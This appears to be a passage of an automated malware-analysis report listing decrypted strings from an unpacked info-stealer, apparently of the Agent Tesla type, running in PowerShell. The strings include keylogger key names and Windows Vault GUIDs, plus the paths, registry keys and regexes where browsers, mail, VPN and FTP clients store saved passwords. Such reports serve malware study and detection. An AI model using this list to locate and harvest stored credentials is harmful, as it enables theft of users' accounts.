                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {CAPSLOCK}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {KEYUP}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {KEYDOWN}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {KEYLEFT}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {KEYRIGHT}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {DEL}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {END}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {HOME}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {Insert}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {NumLock}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {PageDown}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {PageUp}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {ENTER}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F1}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F2}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F3}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F4}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F5}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F6}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F7}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F8}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F9}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F10}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F11}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {F12}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: control
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {CTRL}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: &amp;
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: &lt;
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: &gt;
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: &quot;
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <hr>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: logins
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IE/Edge
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Secure Note
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Web Password Credential
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Credential Picker Protector
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Web Credentials
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Credentials
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Domain Certificate Credential
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Domain Password Credential
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Windows Extended Credential
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SchemaId
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pResourceElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pIdentityElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pPackageSid
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pAuthenticatorElement
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IE/Edge
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UC Browser
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UCBrowser\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Login Data
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: journal
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: wow_logins
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Safari for Windows
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <array>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <dict>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <string>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </string>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <string>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </string>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <data>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </data>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: -convert xml1 -s -o "
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \fixed_keychain.xml"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Microsoft\Credentials\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Microsoft\Credentials\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Microsoft\Credentials\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Microsoft\Credentials\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Microsoft\Protect\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: credential
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: QQ Browser
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Default\EncryptedStorage
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Profile
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \EncryptedStorage
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: entries
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: category
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: str3
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: str2
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: blob0
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: password_value
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IncrediMail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PopPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SmtpPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\IncrediMail\Identities\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Accounts_New
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PopPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SmtpPassword
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SmtpServer
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: EmailAddress
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Eudora
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: current
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Settings
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SavePasswordText
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Settings
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ReturnAddress
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Falkon Browser
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \falkon\profiles\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: profiles.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: profiles.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \browsedata.db
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: autofill
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ClawsMail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Claws-mail
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \clawsrc
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \clawsrc
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: passkey0
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: master_passphrase_salt=(.+)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \accountrc
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: smtp_server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: address
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: account
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \passwordstorerc
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {(.*),(.*)}(.*)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Flock Browser
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Flock\Browser\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: signons3.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: DynDns
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ALLUSERSPROFILE
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: username=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: password=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: https://account.dyn.com/
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: t6KzXhCh
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ALLUSERSPROFILE
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: global
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: accounts
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: account.
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: username
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: account.
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Psi/Psi+
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: name
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Psi/Psi+
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Psi\profiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Psi+\profiles
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \accounts.xml
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \accounts.xml
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: OpenVPN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: username
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: auth-data
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: entropy
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: USERPROFILE
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \OpenVPN\config\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: remote
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: remote
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: NordVPN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: NordVPN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: NordVpn.exe*
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: user.config
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: //setting[@name='Username']/value
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: //setting[@name='Password']/value
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: NordVPN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Private Internet Access
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: %ProgramW6432%
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Private Internet Access\data
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ProgramFiles(x86)
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Private Internet Access\data
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \account.json
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .*"username":"(.*?)"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .*"password":"(.*?)"
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Private Internet Access
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: privateinternetaccess.com
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FileZilla
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FileZilla\recentservers.xml
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FileZilla\recentservers.xml
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Server>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Host>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Host>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </Host>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Port>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </Port>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <User>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <User>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </User>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Pass encoding="base64">
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Pass encoding="base64">
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </Pass>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Pass>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <Pass encoding="base64">
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </Pass>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: CoreFTP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: User
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Host
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Port
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: hdfzpysvpzimorhk
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: WinSCP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HostName
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: UserName
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PublicKeyFile
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PortNumber
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: WinSCP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ABCDEF
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Flash FXP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: port
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: user
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: pass
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: quick.dat
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Sites.dat
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FlashFXP\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FlashFXP\
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FTP Navigator
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SystemDrive
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Server
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: No Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: User
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SmartFTP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: APPDATA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: WS_FTP
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: appdata
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HOST
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PWD=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PWD=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FtpCommander
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SystemDrive
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SystemDrive
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SystemDrive
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \cftp\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Password=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;User=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Server=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Port=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Port=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Password=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;User=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ;Anonymous=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FTPGetter
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \FTPGetter\servers.xml
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_ip>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_ip>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </server_ip>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_port>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </server_port>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_user_name>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_user_name>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </server_user_name>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_user_password>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <server_user_password>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </server_user_password>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: FTPGetter
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: The Bat!
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: appdata
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \The Bat!
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Account.CFN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Account.CFN
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Becky!
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: DataDir
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Folder.lst
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: \Mailbox.ini
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Account
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: PassWd
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Account
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTPServer
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Account
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: MailAddress
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Becky!
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Outlook
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IMAP Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: POP3 Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HTTP Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: SMTP Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Email
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IMAP Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: POP3 Password
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: HTTP Password
